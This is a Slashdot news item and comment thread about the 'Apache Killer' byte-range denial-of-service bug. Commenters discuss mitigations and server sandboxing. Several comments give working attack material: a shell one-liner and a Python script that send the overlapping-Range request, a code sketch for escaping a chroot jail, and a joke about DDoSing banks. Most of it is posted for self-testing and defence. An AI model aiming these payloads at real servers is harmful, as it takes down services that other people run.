
Apache Warns Web Server Admins of DoS Attack Tool

samzenpus posted more than 3 years ago | from the protect-ya-neck dept.

Security 82

CWmike writes "Developers of the Apache open-source project warned users of the Web server software on Wednesday that a denial-of-service (DoS) tool is circulating that exploits a bug in the program. 'Apache Killer' showed up last Friday in a post to the 'Full Disclosure' security mailing list. The Apache project said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours. All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3. 'The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server,' Apache said in an advisory. The bug is not new. Michal Zalewski, a security engineer who works for Google, pointed out that he had brought up the DoS exploitability of Apache more than four-and-a-half years ago. In lieu of a fix, Apache offered steps administrators can take to defend their Web servers until a patch is available."


Apache is too bloated (0)

ge7 (2194648) | more than 3 years ago | (#37198966)

Apache is just like all the other projects that grow too big, where people get ignorant about basics like fast performance and security.

Apache is kind of the PHP of web servers. It's easy to use, it's supported by every webhost since everybody is used to it, and its developers don't give much consideration to security and performance. And this is coming from someone who uses Apache and PHP.

If you truly want a secure, high-performance web server, use nginx [wikipedia.org]. It's much better engineered than Apache.

nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37199164)

nginx is a fantastic web server in some cases, but it does have some pretty serious drawbacks, too. It can't easily run CGI scripts, for instance. You get stuck using FastCGI, or SCGI, or PHP, or a half-assed adapter that tries to make your CGI script a FastCGI script, or some other technique. That does no good for those of us with proven and tested CGI scripts that we need to run. So we'll have to use Apache, lighttpd, or one of the many other non-nginx web servers out there instead, until nginx gets its act together.

(If you're a Rails kid who's going to spew your "but CGI is slow and insecure!" bullshit, take it elsewhere.)

Re:nginx has its problems, too. (1)

Ice Station Zebra (18124) | more than 3 years ago | (#37200272)

Welcome to 2011, not running CGI scripts is a feature (and a good one at that).

Re:nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37200506)

*nix systems make it very easy to safely run CGI scripts. If you really have that much trouble creating non-privileged accounts, setting the proper filesystem permissions, using chroot/jails/containers/zones, and setting process limits, then maybe you shouldn't be running a web server in the first place. After all, those are things you should be doing regardless of the technology you're using.

You're probably one of those "Rails kids" he refers to. Like he said, your opinion doesn't matter. It's hard to take people like you seriously when we see crap like Diaspora. Then we soon learn that basically every Rails web app is written as poorly. We can't forget about the PHP bunglers, too, who ignore hundreds of failing regression tests and then make a release where the crypt() function is very broken [slashdot.org] !

If you people say that we're doing it wrong by properly using *nix operating systems, by using a reliable technique like CGI, and by using reliable and well-tested languages like Perl and Python, then we can relax comfortably knowing that we're actually doing things right.
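For what it's worth, the process-limit part of that takes only a few lines on any *nix. Here's a hedged sketch in Python; the helper name and limit values are made up, and a real deployment would also setuid to a dedicated unprivileged account (which requires starting as root):

```python
import resource
import subprocess

def run_untrusted(cmd, cpu_seconds=5, mem_bytes=1 << 30):
    """Run a CGI-style command under tightened process limits (Unix only)."""
    def limit():
        # Applied in the child just before exec: cap CPU time and address
        # space so a runaway script can't take the whole box down.
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))
        resource.setrlimit(resource.RLIMIT_AS, (mem_bytes, mem_bytes))
        # A real setup would also drop to an unprivileged uid/gid here
        # (os.setgid()/os.setuid()), which requires starting as root.
    return subprocess.run(cmd, preexec_fn=limit, capture_output=True, text=True)
```

The limits are inherited across exec, so whatever the script does, the kernel enforces the caps.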

Re:nginx has its problems, too. (1)

LordLimecat (1103839) | more than 3 years ago | (#37200934)

using chroot/jails/containers/zones

Not being a Linux guru, I thought I had heard repeatedly that "chroots do NOT provide security"? Can't someone who pulls off a privilege escalation escape the chroot?

Re:nginx has its problems, too. (1)

maxwell demon (590494) | more than 3 years ago | (#37201970)

What about running CGI scripts on a separate virtual machine from the rest of the system? Basically, set up a separate web server there and have all CGI scripts executed from it. For access to shared resources, have a "gate keeper" process (or module in the web server) running on the original host which can give out one-time passwords; these are passed on to the script, which can then use them to access the resources through that gate keeper. The gate keeper can have detailed knowledge of what each script is allowed to access, and block any other request.

I'm not sure if this would be feasible performance-wise, but I think it would make for quite a secure system. Indeed, the script server could mount all file systems read-only (you could even remove the write capability from the file system driver if you're paranoid enough), because you don't need to change the scripts from within the scripts (installing the scripts would be done from the host system or another virtual machine).

That way, even if someone managed to hijack a script, the worst he could do is mess with those things the specific script is allowed to access (because the gate keeper knows which script was called, and won't allow any other access). Unless the attacker additionally finds a security hole in the gate keeper process, of course. As an additional bonus, the scripts would not need to have the database password (the gate keeper would), so even if the script server were completely hacked, the database password would still not leak.
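A toy sketch of that gate keeper, to make the one-time-password flow concrete (the class name, ACL shape, and return values are all invented for illustration):

```python
import secrets

class GateKeeper:
    """Hypothetical broker: scripts never hold real credentials. They redeem
    single-use tokens, each bound to one script's allowed resources."""

    def __init__(self, acl):
        self.acl = acl          # e.g. {"search.cgi": {"db:products"}}
        self.tokens = {}        # outstanding token -> issuing script

    def issue(self, script):
        token = secrets.token_hex(16)
        self.tokens[token] = script
        return token

    def access(self, token, resource):
        script = self.tokens.pop(token, None)   # one-time: token is consumed
        if script is None:
            raise PermissionError("unknown or reused token")
        if resource not in self.acl.get(script, ()):
            raise PermissionError(f"{script} may not touch {resource}")
        return f"granted:{resource}"            # stand-in for the real lookup
```

Each token is consumed on first use, so even a token leaked from a hijacked script is only good for one request against that script's own ACL.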

Re:nginx has its problems, too. (1)

silanea (1241518) | more than 3 years ago | (#37202888)

And people call Apache bloated. Right.

Re:nginx has its problems, too. (1)

Seyedkevin (1633117) | more than 3 years ago | (#37211642)

Web servers run without root privileges so that the server isn't capable of doing overtly harmful things, but it can still modify the things the web server is supposed to modify. That is, it can still mess those up.

If you want to give scripts a separately isolated area, you can use this: http://httpd.apache.org/docs/2.0/suexec.html [apache.org] File system permissions take over from here.

I don't know too much about SQL servers, but couldn't you use Kerberos or something instead of directly using database passwords?

Re:nginx has its problems, too. (2)

ArsenneLupin (766289) | more than 3 years ago | (#37202950)

Can't someone who pulls off a privilege escalation escape the chroot?

Yes, he can. Basically, the trick is to do another chroot to a subdirectory, but without doing the chdir. So now the attacker is in a situation where the current directory is above the root. Here he can keep doing chdir(".."); until he reaches the real root, and then all he needs to do is chroot(".");.

What's worse, this exploit is due to the way chroot is specified, so it can't really be fixed in the kernel.

So yes, you can escape a chroot jail if you've got root. However, the point of the chroot jail is to prevent attackers from gaining root in the first place, by confining them to a minimal and more controllable environment which has no spare crowbars lying around.

Moreover, other confinements, such as BSD jails, containers or zones may not have the problem outlined above.
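For the curious, the breakout sequence described above fits in a few lines. This sketch makes the syscalls injectable purely so the sequence can be shown and exercised without actually running as root; with the real os.chroot/os.chdir it only works if you already have root:

```python
import os

def escape_chroot(subdir="jail", depth=64, *,
                  mkdir=os.mkdir, chroot=os.chroot, chdir=os.chdir):
    # 1. chroot() into a throwaway subdirectory WITHOUT chdir()ing first,
    #    so the current working directory stays outside the new root.
    mkdir(subdir)
    chroot(subdir)
    # 2. From outside the root, ".." keeps climbing; repeat generously
    #    to be sure of reaching the real filesystem root.
    for _ in range(depth):
        chdir("..")
    # 3. Re-anchor our root at the real "/".
    chroot(".")
```

This is exactly why the jail only helps if the attacker never gets root inside it.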

Re:nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37203460)

The grsecurity [grsecurity.net] patchset lets you prevent the various ways of escaping chroot jails (of which there are a lot), amongst other things. But yeah, fundamentally chroot was never meant to provide security. IIRC it was implemented as a convenience feature for kernel development.

Re:nginx has its problems, too. (1)

X0563511 (793323) | more than 3 years ago | (#37206330)

A proper SELinux (or AppArmor, I'd imagine) policy would also serve to confine them in their box.

Re:nginx has its problems, too. (1)

badkarmadayaccount (1346167) | more than 3 years ago | (#37226210)

Or, OpenVZ containers.

Re:nginx has its problems, too. (0)

Anonymous Coward | more than 3 years ago | (#37203596)

In theory, yes (although in practice it's extremely rare and difficult). And that's probably why the GP listed other, better approaches that Linux doesn't support, like FreeBSD jails and Solaris containers and zones.

Re:nginx has its problems, too. (1)

overlordofmu (1422163) | more than 3 years ago | (#37207352)

Do not reply to the AC trolls, please.

Although, your comment was quite damn funny.

Re:Apache is too bloated (3, Interesting)

Monoecus (1761264) | more than 3 years ago | (#37199174)

Yes, that's why I use Hiawatha [wikimedia.org] .

Re:Apache is too bloated (0)

Anonymous Coward | more than 3 years ago | (#37199642)

Yes, that's why I use Hiawatha [wikimedia.org] .

I second that.

Re:Apache is too bloated (1)

MechaStreisand (585905) | more than 3 years ago | (#37199796)

Really? Apache has 200+ failed unit tests that are just ignored? [php.net]

They're not even close to comparable. Apache has served me very well. My server is not even vulnerable to this as I don't have mod_deflate loaded or compiled. (I tested using the kill script.)

Re:Apache is too bloated (1)

Anonymous Coward | more than 3 years ago | (#37200164)

The link in the blurb claiming to point to the advisory from Apache isn't correct.

The actual advisory from Apache notes that mod_deflate's presence is orthogonal (irrelevant) to the exploitability of this issue.

The correct link:

http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110824161640.122D387DD@minotaur.apache.org%3E [apache.org]

Re:Apache is too bloated (1)

MechaStreisand (585905) | more than 3 years ago | (#37200386)

Regardless, my server isn't vulnerable - that's all I care about.

Re:Apache is too bloated (1)

X0563511 (793323) | more than 3 years ago | (#37206142)

Let's not forget that being a proper admin and having Apache locked down by, for example, some SELinux policies makes it a pretty tough nut to crack.

Oh god LulzSec (1)

Chrysocolla (2314992) | more than 3 years ago | (#37198998)

Quick Apache! They will use it and claim 1337 hax!

thej3st3r DoS 0day? (0)

Anonymous Coward | more than 3 years ago | (#37199028)

I wonder if this is the 0day used by rabid self-publicist "thej3st3r" in his oh so very leet DoS tool? Tor + Slowloris + something else was the conclusion of lulzsec, and I think they're probably right.

Someone should have attended Secure Codeing 101 (1)

gweihir (88907) | more than 3 years ago | (#37199192)

Algorithmic complexity attacks (of which this is an example) are nothing new. They have been done on really bad sorting algorithms (quicksort, which is still defended by quite a few people who simply do not get it or are not bright enough to implement the alternatives) and are today employed, e.g., against hash tables. Libraries/languages by people with a clue (e.g. Lua) have protection against that. Others do not.

Writing secure code is a bit harder than writing merely working code. I guess people have to find that out over and over again....
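The hash-table case is easy to demonstrate without a real colliding-key generator; a class whose instances all hash alike stands in for attacker-chosen keys (the names here are invented for illustration):

```python
class Colliding:
    """Simulates attacker-chosen keys that all land in the same bucket."""
    eq_calls = 0

    def __init__(self, n):
        self.n = n

    def __hash__(self):
        return 42                   # every key collides

    def __eq__(self, other):
        Colliding.eq_calls += 1     # count the probe work
        return self.n == other.n

def insert_cost(n):
    """Equality comparisons needed to build a dict of n colliding keys."""
    Colliding.eq_calls = 0
    table = {}
    for i in range(n):
        table[Colliding(i)] = i     # each insert scans the whole collision chain
    return Colliding.eq_calls
```

Doubling the input roughly quadruples the comparison count, i.e. O(n^2) insertion instead of O(n); that quadratic blow-up is exactly what hash-flooding DoS attacks exploit.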

Re:Someone should have attended Secure Codeing 101 (-1)

Anonymous Coward | more than 3 years ago | (#37199292)

You know what, fuck you and your high horse. You can't even write Lua properly and you're dissing on programmers because they use the algorithm that literally everyone is recommending them to use, giving no other alternatives because you probably have no fucking clue why quicksort sucks so damn much.

Re:Someone should have attended Secure Codeing 101 (1)

Narcocide (102829) | more than 3 years ago | (#37199408)

This [lmgtfy.com] might be informative.

Re:Someone should have attended Secure Codeing 101 (0)

Anonymous Coward | more than 3 years ago | (#37199756)

No it's not, it's a Google search. If you're gonna give advice on a discussion thread, give actual advice. I'm perfectly capable of googling it myself, but I'm not the one dissing shit without backing it up in a discussion thread (plus I already know that there are better algorithms than quicksort).

Re:Someone should have attended Secure Codeing 101 (1)

Narcocide (102829) | more than 3 years ago | (#37199848)

Alright, fair enough. Maybe you already know this, but just for the benefit of the other readers: Quicksort is just fine if you can trust that the data is generally randomized in order. The problem is primarily that it accomplishes its speedup by making the unsafe assumption that this is the case, meaning it's really easy to dramatically increase the processing time required for a given sort by feeding it data in certain specific patterns, such as reverse order or almost completely reverse order. It's generally considered a BAD idea to use quicksort on things like public services where the users can directly affect the order of the data passed to it.
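To make that concrete, here's a minimal first-element-pivot quicksort with a comparison counter; already-sorted input (the classic adversarial pattern) does quadratic work while shuffled input stays near N log N:

```python
def quicksort(items, _comparisons=None):
    """Textbook quicksort with a naive first-element pivot.
    Returns (sorted_list, total_comparisons_so_far)."""
    if _comparisons is None:
        _comparisons = [0]
    if len(items) <= 1:
        return list(items), _comparisons[0]
    pivot, rest = items[0], items[1:]
    _comparisons[0] += len(rest)            # one comparison per partitioned element
    left = [x for x in rest if x < pivot]
    right = [x for x in rest if x >= pivot]
    sorted_left, _ = quicksort(left, _comparisons)
    sorted_right, _ = quicksort(right, _comparisons)
    return sorted_left + [pivot] + sorted_right, _comparisons[0]
```

On a sorted list of 300 items this makes 300*299/2 = 44,850 comparisons; a shuffled copy takes only a few thousand. That gap is the whole attack: feed a service sorted data and its "fast" sort crawls.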

Re:Someone should have attended Secure Codeing 101 (0)

Anonymous Coward | more than 3 years ago | (#37200326)

gweihir, this is how you should post ^

Re:Someone should have attended Secure Codeing 101 (1)

gbjbaanb (229885) | more than 3 years ago | (#37203062)

Considering the poor choice of a response, you should have checked your links. The first one is "why quicksort sucks", which goes on to explain why a *modified* quicksort algorithm posted on Wikipedia is not better than the original quicksort algorithm.

The 3rd link is "why java sucks", and down on the first page is "why .net sucks".

If you want to explain issues with an algorithm like that - say what it is, rather than posting a snide lmgtfy link that is wrong for the problem at hand.

So far it seems to me that the problem with quicksort is in the data provided to it, which in some cases can blow up the running time quadratically. But to say that means quicksort sucks is like saying hammers suck because you might hit your thumb.

Re:Someone should have attended Secure Codeing 101 (1)

LordLimecat (1103839) | more than 3 years ago | (#37205214)

Can't comment on quicksort since it's been years since I was in a CS class, but none of those Google results indicate that quicksort sucks.

Usually you want your LMGTFY to show clear examples that make your case, and none of those links do.

Re:Someone should have attended Secure Codeing 101 (1)

zippthorne (748122) | more than 3 years ago | (#37200152)

Who recommends quicksort for anything? It's got a bad O(N^2) degenerate case that's been known about since the development of the algorithm.

It's my understanding that merge sort or merge/insertion hybrids are typically used in general, as merge sort is O(N log N) for all inputs and stable, while insertion sort can be extremely fast for short lists (but is not appropriate for large lists, as it's also O(N^2)). Other sorts might be chosen if the data is known in advance to have favorable properties for them.

Quick sort's main use is for CS101 courses, to give you something that is relatively easy to understand, implement, and analyze, and which can be easily compared with the other CS101 sort technique, bubble sort.

Re:Someone should have attended Secure Codeing 101 (1)

micheas (231635) | more than 3 years ago | (#37200296)

I guess it depends on how many bits you have to implement your sort in.

If you are cramming the sort into less than 8 bytes, speed will take a back seat. If you can use gigabytes of memory, you do a much faster, more memory-intensive sort.

Re:Someone should have attended Secure Codeing 101 (1)

IDK (1033430) | more than 3 years ago | (#37202898)

Not only that, but quicksort is faster on average-sized inputs, which is what you work with most of the time.
Low complexity doesn't equal speed.

Re:Someone should have attended Secure Codeing 101 (1)

BitHive (578094) | more than 3 years ago | (#37201854)

Sadly, idiots (of which the the folks that codeed Apache are an example) nothing new. Their mediocrity has long suffocated us bright folk, many of whom are too timid to call these people what they are: pathetic failures. Others, like yourself, are not.

Achieving perfection is a bit harder than merely rewriting flawed code. I guess people have to experience humiliation over and over again...

Re:Someone should have attended Secure Codeing 101 (0)

Anonymous Coward | more than 3 years ago | (#37205052)

Sadly, idiots (of which the the folks that codeed Apache are an example) nothing new. Their mediocrity has long suffocated us bright folk, many of whom are too timid to call these people what they are: pathetic failures. Others, like yourself, are not.

Achieving perfection is a bit harder than merely rewriting flawed code. I guess people have to experience humiliation over and over again...

Tit.

Re:Someone should have attended Secure Codeing 101 (1)

Unequivocal (155957) | more than 3 years ago | (#37210164)

This is a joke right?

Re:Someone should have attended Secure Codeing 101 (1)

BitHive (578094) | more than 3 years ago | (#37210804)

Someone should have attended Spotting Sarcasm 101.

Re:Someone should have attended Secure Codeing 101 (1)

Unequivocal (155957) | more than 3 years ago | (#37212418)

:) I had to ask. On /. it's not as easy to tell as I would like...

Re:Someone should have attended Secure Codeing 101 (1)

maxwell demon (590494) | more than 3 years ago | (#37201998)

There are still people who didn't switch to introsort?

If this was IIS (1)

bonch (38532) | more than 3 years ago | (#37199308)

Imagine the anti-Microsoft shitstorm around here if this was an IIS attack tool.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37199370)

I had a lot of fun with the IIS 5.0 WebDAV buffer overflow back in the day. :)

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37199402)

Microsoft (or any other big company) could never act as fast as the Apache developers do... even though the bug is way old, the DoS tool appeared last Friday and the patch should be ready within 48 hours (in fact, reading other comments, a patch is already available).

Re:If this was IIS (1)

Anonymous Coward | more than 3 years ago | (#37199524)

The patch has taken 4.5 years. If we have to wait for someone to start exploiting vulnerabilities before we are allowed to get a patch, then I don't care how fast those patches come; it is a major fail.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37200752)

If it were a real problem, then over half of the web would have been brought down already (especially with over 4 years to take advantage of the exploit).

Re:If this was IIS (1)

LordLimecat (1103839) | more than 3 years ago | (#37205318)

None of these justify the reaction that IIS would have gotten.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37202164)

The patch has taken 4.5 years. If we have to wait for someone to start exploiting vulnerabilities before we are allowed to get a patch then I don't care how fast those patches come it is a major fail.

I think you might be a little unclear on how this works. When someone does a ./configure; make; make install of Apache, they are compiling the source code, which they have, and which any of a large number of C coders can dig through and come up with a fix for. We are allowed to get a patch any time we want to code one up. I myself have made changes to sendmail, apache, and nontrivial changes to dhcpd (to make the dhcpctl calls to add and remove MACs to pools actually work) and at any point in the past 4.5 years I or any number of halfwit programmers could have fixed this particular Apache vulnerability had we been aware and concerned enough about it to do so. Having read about the vulnerability and not running a web site other than my own, I'm not particularly concerned about this one. It's a DoS, not a remote code injection, so I'll be going to bed shortly rather than applying the patch that others have graciously ferreted out and made available.

In contrast, if this was IIS, patching the available source code would not be an option, because the source code is not available.

Re:If this was IIS (0)

Anonymous Coward | more than 3 years ago | (#37205672)

Oh, so because anyone could have fixed it in the last 4.5 years, that makes it alright, even though no one fixed it. Got it.

Slashdot is vulnerable... (4, Interesting)

CajunArson (465943) | more than 3 years ago | (#37199324)

All versions in the 1.3 and 2.0 lines are said to be vulnerable to attack. The group no longer supports the older Apache 1.3.

Since Slashdot is still stuck in the late '90s, with a thin veneer of bad JavaScript over Apache 1.3, it's vulnerable... and no patch, either.

Re:Slashdot is vulnerable... (1)

CajunArson (465943) | more than 3 years ago | (#37199418)

Oh and before you say that Malda & crew will do a deep code analysis of the 1.3 branch and fixit themselves:
              1. They're STILL RUNNING 1.3!!
              2. Slashcode... QED.

Re:Slashdot is vulnerable... (1)

Briareos (21163) | more than 3 years ago | (#37206530)

3. No more Malda [slashdot.org] .

Re:Slashdot is vulnerable... (0)

Anonymous Coward | more than 3 years ago | (#37199816)

But /. has a pretty decent server farm, or it would already be /.ed itself. So you'd need a fair number of machines targeting it with this exploit.

First person to combine this DoS exploit with an autorun exploit for any common browser/plugin combo and then get their "blog" linked in a /. article wins major lols.

Re:Slashdot is vulnerable... (1)

antdude (79039) | more than 3 years ago | (#37201538)

So someone could use this exploit and take /. down. :(

Re:Slashdot is vulnerable... (1)

gl4ss (559668) | more than 3 years ago | (#37201996)

Maybe they patched it. Or maybe they filter the vuln before it hits Apache; it seems it's just about asking for a large number of ranges in a HEAD request.

A quick summary (5, Informative)

rabtech (223758) | more than 3 years ago | (#37199826)

A quick summary: A client can use byte-range requests that are overlapping and/or duplicated, so a single small request overloads the server. E.g., 0-,0-,0- would request the entire contents of the file three times. YMMV, but this has to do with how Apache's handling of the multipart responses consumes memory; it isn't an actual bandwidth DoS.

Unfortunately there are legit reasons for allowing out-of-order ranges and multiple ranges, such as a PDF reader requesting the header, then skipping to the end of the file for the index, then using ranges to request specific pages. Another example was a streaming movie skipping forward by grabbing byte ranges to look for i-frames without downloading the entire file.

So the fix discussion centers on when to ignore a range request, when you can merge ranges, whether you can re-order them, whether you can reject overlapping ranges and how much they need to overlap, etc. The consensus seems to be that first you merge adjacent ranges; then, if too many ranges are left OR too many duplicated bytes are requested, the request skips the multi-part handling and just does a straight-up 200 OK stream of the whole file, or throws back a 416 (can't satisfy multipart request).
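That consensus fix is straightforward to sketch. Everything below (the threshold values, the 200-vs-416 choice, ignoring suffix ranges like "-500") is invented for illustration and is not Apache's actual patch:

```python
def parse_ranges(header, size):
    """Parse 'bytes=a-b,c-' into (start, end) pairs; suffix ranges omitted."""
    value = header[6:] if header.startswith("bytes=") else header
    spans = []
    for part in value.split(","):
        start, _, end = part.partition("-")
        s = int(start) if start else 0
        e = int(end) if end else size - 1
        spans.append((s, min(e, size - 1)))
    return spans

def plan_response(header, size, max_spans=32):
    """Merge adjacent/overlapping spans first; if too many remain, or the
    client asked for far more bytes than the file holds, skip the multipart
    machinery and stream the whole file as a plain 200."""
    spans = sorted(parse_ranges(header, size))
    merged = []
    for s, e in spans:
        if merged and s <= merged[-1][1] + 1:       # adjacent or overlapping
            merged[-1] = (merged[-1][0], max(merged[-1][1], e))
        else:
            merged.append((s, e))
    requested = sum(e - s + 1 for s, e in spans)
    if len(merged) > max_spans or requested > 2 * size:
        return "200", [(0, size - 1)]               # whole file, no multipart
    return "206", merged
```

The legitimate PDF-reader and video-seek cases survive (a handful of disjoint spans come back as a 206), while the 0-,0-,0- attack collapses into a single plain response.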

Re:A quick summary (2)

sonamchauhan (587356) | more than 3 years ago | (#37200280)

Shouldn't the fix just be that Apache calculates the _total_ size requested by the client and, if that crosses some definable limit, knocks back the request with an HTTP 4xx response ("client demands too much") or, if it wants to be polite, a 5xx error ("we're not Google")?

Re:A quick summary (0)

Anonymous Coward | more than 3 years ago | (#37200882)

( "client demands too much" )

Ah the classic "469: Wife" error.

Re:A quick summary (1)

PiSkyHi (1049584) | more than 3 years ago | (#37227448)

Or one could gather the range requests and create a merge list with no repeats, so Apache only keeps one copy in memory. Maybe if there are too many repeated requests for overlapping ranges, the error could be "I'm sorry, could you repeat that please?"

Re:A quick summary (1)

Anonymous Coward | more than 3 years ago | (#37200576)

Worse than that... even requesting a lot of small ranges can overload the server. The example code (IIRC) requested the range 5-,5-0,5-1,5-2,5-3,5-4...5-1299 repeatedly. The real killer, though, is Accept-Encoding: gzip, which causes Apache to try to zip all of those tiny ranges. That's really what kills the server.

IIS is better (-1)

Anonymous Coward | more than 3 years ago | (#37199896)

This doesn't happen with latest version of IIS. Fucking freetards.

Damn M$ Only Cares About Money (0)

Anonymous Coward | more than 3 years ago | (#37199898)

and lets the quality of their software go to hell and allowing exploits to... what? open source? no, that can't be, only IIS is subject to exploit. Slashdot lied to me!

Not that bad (4, Interesting)

Evets (629327) | more than 3 years ago | (#37200570)

I read the advisory, chose a course of action, then it took about a minute to make my server not vulnerable. It's great that they made the disclosure.

Re:Not that bad (2)

Onymous Coward (97719) | more than 3 years ago | (#37212800)

In more detail...

Some of the suggestions from the Full Disclosure discussion and elsewhere:

Re:Not that bad (0)

Anonymous Coward | more than 3 years ago | (#37213764)

I read the advisory, chose a course of action, then it took about a minute to make my server not vulnerable. It's great that they made the disclosure.

Why give props for disclosing that there is an easily accessible attack tool being used? The cat's sort of out of the bag at that point. Anyone, the attackers even, might just as well have made the announcement.

test your vulnerability (5, Informative)

Anonymous Coward | more than 3 years ago | (#37200722)

You can do a quick test with something like this:

/bin/echo -en "HEAD / HTTP/1.1\r\nHost:localhost\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80

If you're vulnerable, you should see a really ridiculously long Content-Length header, like 900k or so.

Disabling mod_deflate or the equivalent prevents this behavior, but it's not clear that there isn't another exploit waiting to happen. A super quick fix is to kill the Range header entirely using mod_headers, like so:

RequestHeader unset Range

in your apache.conf or moral equivalent. For the most part, you can get away with not serving Range headers, and if you can't, you know it and don't need my advice on fixing this.
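The same probe can be built with Python's socket module instead of echo/nc; the request mirrors the one-liner above (the probe() helper is a sketch, and obviously shouldn't be pointed at servers you don't own):

```python
import socket

def build_probe(host, n=1300):
    """The request from the shell one-liner: one open-ended range plus
    n overlapping tiny ranges, with gzip requested."""
    ranges = "0-," + ",".join(f"5-{i}" for i in range(1, n + 1))
    return (f"HEAD / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Range: bytes={ranges}\r\n"
            f"Accept-Encoding: gzip\r\n"
            f"Connection: close\r\n\r\n").encode()

def probe(host, port=80):
    """Send the probe and return the raw response headers
    (network call, not exercised here)."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(build_probe(host))
        return s.recv(65536).decode(errors="replace")
```

As above, a vulnerable server answers the HEAD with an absurdly large Content-Length.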

Re:test your vulnerability (1)

Noodlenoggin (1295699) | more than 3 years ago | (#37201458)

Just to add on to this, if your web server doesn't accept requests addressed to localhost or the ip address with a rewrite rule or for some other reason, then you may need to add in the hostname for that query rather than just using localhost for the headers.

eg: echo -en "HEAD / HTTP/1.1\r\nHost:www.mydomainname.com\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80


A couple of my servers have Limit options set with a deny from all to the base htdocs folder, therefore only allowing virtual hosts to supply content and not the base host itself.
Sending 'localhost' as the header would return a 403 Forbidden with no mention of the Content-Length at all, even though the server was vulnerable.

Re:test your vulnerability (0)

Anonymous Coward | more than 3 years ago | (#37202256)

Disabling mod_deflate or the equivalent prevents this behavior, but it's not clear that there isn't another exploit waiting to happen.

Indeed. The advisory itself says

When using a third party attack tool to verify vulnerability - know that most of the versions in the wild currently check for the presence of mod_deflate; and will (mis)report that your server is not vulnerable if this module is not present. This vulnerability is not dependent on presence or absence of that module.

Re:test your vulnerability (1)

rabtech (223758) | more than 3 years ago | (#37207366)

Just wanted to point out that this does *not* depend on mod_deflate or mod_gzip. Those make the problem worse, but the real issue is that Apache sets up a lot of internal data structures to handle the "metadata" of the multi-part request. Even with compression disabled, you can still easily overload the server with comparatively few requests, because you're asking Apache to set up thousands and thousands of multi-part buckets for each single HTTP request. It doesn't take very many requests to bring everything to a standstill.



Touchpads? (1)

Mikachu (972457) | more than 3 years ago | (#37202570)

When I saw the headline, I thought Apache was going to warn retailers about selling HP touchpads...

mod_evasive ? (1)

slydder (549704) | more than 3 years ago | (#37202670)

Has anyone noticed whether mod_evasive disarms/mitigates this attack vector?

How to test it against HTTPS? (1)

Swampcritter (1165207) | more than 3 years ago | (#37203602)

Exploit code and ways of testing the vulnerability seem to be addressed towards HTTP. Has anyone tested it against HTTPS yet?

Re:How to test it against HTTPS? (1)

TheNinjaroach (878876) | more than 3 years ago | (#37210956)

HTTPS is still HTTP. There's just an SSL layer in between. If you want to interact with some HTTPS server, try using OpenSSL with the s_client option.

Vulnerability first reported in 2007 (1)

Skuto (171945) | more than 3 years ago | (#37203986)

With the bug first reported over 4.5 years ago, this was entirely avoidable.

http://seclists.org/bugtraq/2007/Jan/83 [seclists.org]

Indexes (1)

brabo_sd (1279536) | more than 3 years ago | (#37205750)

FYI, Options -Indexes on /var/www made my boxes safe against this attack.

Not on OpenBSD (1)

CarsonChittom (2025388) | more than 3 years ago | (#37206294)

The included Apache 1.3 on OpenBSD (heavily patched by the OpenBSD developers) appears not to be vulnerable [marc.info] . The Apache2 in the ports tree may well be, though.

Recommended webserver for WSGI Python apps? (1)

Just Some Guy (3352) | more than 3 years ago | (#37206942)

Since we're discussing Apache anyway... I've used Apache for over a decade now. Right now I'm working on a Pyramid [pylonsproject.org] app and publishing it with mod_wsgi [google.com] on Apache 2.2, for no other reason than that I'm already familiar with Apache. Since this is a brand new project and will be running on its own dedicated server - and therefore doesn't have to play nicely with any pre-existing web apps - I wanted to re-evaluate my decision. If you needed to publish a WSGI app today, what server would you use and why?

Confisusion.. (1)

iridium213 (2029192) | more than 3 years ago | (#37207952)

So...

"... and said it would release a fix for Apache 2.0 and 2.2 in the next 48 hours."
...
"... According to Apache, all versions in the 1.3 and 2.0 lines are vulnerable to attack."

So dropping support for 1.3 I understand (EOL etc.), but fixing 2.2 even though it isn't reported as vulnerable? Which is it?

Re:Confisusion.. (1)

geminidomino (614729) | more than 3 years ago | (#37211302)

I figured it was two different points. The first being that they'd release a fix for 2.x, and the other a less than subtle "Update your goddamn software!" reminder.

4 .5 years before they do something.... (1)

hesaigo999ca (786966) | more than 3 years ago | (#37220388)

I am glad they finally got to it, but if Apache had told their bank there was an issue with their account, I am sure they would have wanted the bank to do something right away, not 4.5 years later... you just have to hit them where it hurts: DDoS their banks, not their servers.
